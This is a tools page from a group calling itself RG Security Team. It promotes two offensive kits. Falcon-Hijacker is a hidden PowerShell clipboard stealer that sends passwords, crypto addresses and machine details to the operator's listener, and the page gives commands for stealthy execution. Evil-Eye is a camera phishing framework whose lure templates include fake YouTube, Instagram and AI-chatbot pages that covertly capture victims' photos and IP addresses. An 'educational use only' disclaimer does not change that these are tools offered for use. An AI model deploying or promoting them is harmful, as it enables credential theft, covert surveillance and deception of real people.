HOME RG Security Logo RG SECURITY TEAM
// tools/
// OPEN SOURCE ARSENAL

Our Security Tools

Open-source cybersecurity tools built by RG Security Team. Designed for educational research and authorized penetration testing.

2 Active Tools  ·  100% Open Source  ·  Kali Linux Tested
⚠️

EDUCATIONAL USE ONLY — AUTHORIZED ACCESS REQUIRED

All tools on this page are created strictly for cybersecurity education, research, and authorized penetration testing. Using these tools against any system or individual without explicit written permission is illegal and unethical. The RG Security Team bears no responsibility for any misuse or damage caused by these tools. By accessing this page you agree to use all information responsibly and lawfully.

🦅
v0.1 · MIT LICENSE · SHELL / PHP / POWERSHELL

FALCON-HIJACKER

Automated Clipboard Data Capture & Monitoring Tool

CLIPBOARD MONITOR KALI LINUX WINDOWS PAYLOAD REAL-TIME

WHAT IS FALCON HIJACKER?

Falcon Hijacker is a professional clipboard monitoring tool designed for authorized security assessments. It captures real-time clipboard data from target systems through a streamlined Bash interface running on Linux, with a PowerShell payload deployed on Windows targets.

The tool sets up a local PHP web server and delivers a stealthy PowerShell payload that silently monitors and transmits clipboard content every 10 seconds — including text, passwords, crypto addresses, and more.

KEY FEATURES

  • Live clipboard data streaming in real-time
  • Timestamped structured logging with metadata
  • PowerShell payload — no visible window, error suppression
  • Checks clipboard every 10 seconds automatically
  • Sends clipboard content + machine info + username
  • Clean log export format for analysis
  • Simple one-command setup on Linux

SUPPORTED PLATFORMS

✅ Kali Linux ✅ Parrot Sec OS ⚙️ Termux (untested) 🎯 Windows (target)

TECH STACK

Bash Shell PHP (web server) PowerShell wget
01
INSTALL DEPENDENCIES
apt-get -y install php wget

// Required: PHP for web server, wget for downloading dependencies

02
CLONE THE REPOSITORY
git clone https://github.com/rgsecteam/falcon-hijacker
03
NAVIGATE & RUN
cd falcon-hijacker
bash falcon.sh
01
DEPLOY POWERSHELL PAYLOAD ON TARGET (WINDOWS)
powershell -NoP -NonI -W h -Exec Bypass .\clipboard_logger.ps1

// Runs the payload — checks clipboard every 10s, sends to your listener

02
HIDDEN EXECUTION (BACKGROUND)
Start-Process powershell -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File .\clipboard_logger.ps1" -WindowStyle Hidden

// Runs completely hidden — no terminal window visible to the target

03
STOP THE BACKGROUND PROCESS
Stop-Process -Name powershell -Force

// Run on the Windows target to kill all powershell background processes

👁
v0.1 · GPL-3.0 LICENSE · BASH / PHP / JS

EVIL-EYE

Silent Camera Capture Framework via Social Engineering

CAMERA PHISHING CLOUDFLARE TUNNEL 5 TEMPLATES CROSS-DISTRO

WHAT IS EVIL-EYE?

Evil-Eye is a modular, Bash-based camera phishing framework designed for security awareness demonstrations and authorized penetration testing. It automates a local PHP server and uses Cloudflare's encrypted tunnel to generate a public HTTPS link — no port forwarding required.

When a victim opens the link and grants camera permission, their front camera is silently captured and saved along with their IP address and browser info.

KEY FEATURES

  • Silent camera capture via browser getUserMedia API
  • Instant public HTTPS link via Cloudflare tunnel
  • 5 convincing social engineering lure templates
  • Logs victim IP address and browser user-agent
  • Auto dependency detection and installation
  • Cross-distro: Kali, Parrot, Ubuntu, macOS
  • Images saved as cam<timestamp>.jpg

SUPPORTED PLATFORMS

✅ Kali Linux 2024.x ✅ Parrot OS 6.x ✅ Ubuntu 22/24.04 ✅ macOS Ventura+ 🔜 Termux (Coming Soon)

CAPTURED DATA

📷 cam<timestamp>.jpg 🌐 captured_ip.txt 🖥 Browser UA

TECH STACK

Bash PHP 7.4+ JavaScript Cloudflared CSS
01
CLONE THE REPOSITORY
git clone https://github.com/rgsecteam/evil-eye.git
02
NAVIGATE TO DIRECTORY
cd evil-eye
03
GIVE EXECUTION PERMISSION
chmod +x evel.sh
04
RUN THE TOOL
./evel.sh

// cloudflared and lolcat will be installed automatically if not found

// TEMPLATE 01
YouTube Live TV
Fake YouTube Live stream. Victim must "verify age" to watch — camera triggered automatically.
// TEMPLATE 02
Birthday Wish
Personalized birthday page with animations and music. Camera permission requested for a "selfie".
// TEMPLATE 03
Secret Message
Mysterious page claiming a secret message awaits. Camera triggered silently in the background.
// TEMPLATE 04
Fake Instagram
Promises free Instagram followers — "camera verification required to prove you're human".
// TEMPLATE 05
AI Chatbot
Fake AI assistant interface. Camera access requested in the background during interaction.
MORE TOOLS COMING SOON
// next release in progress...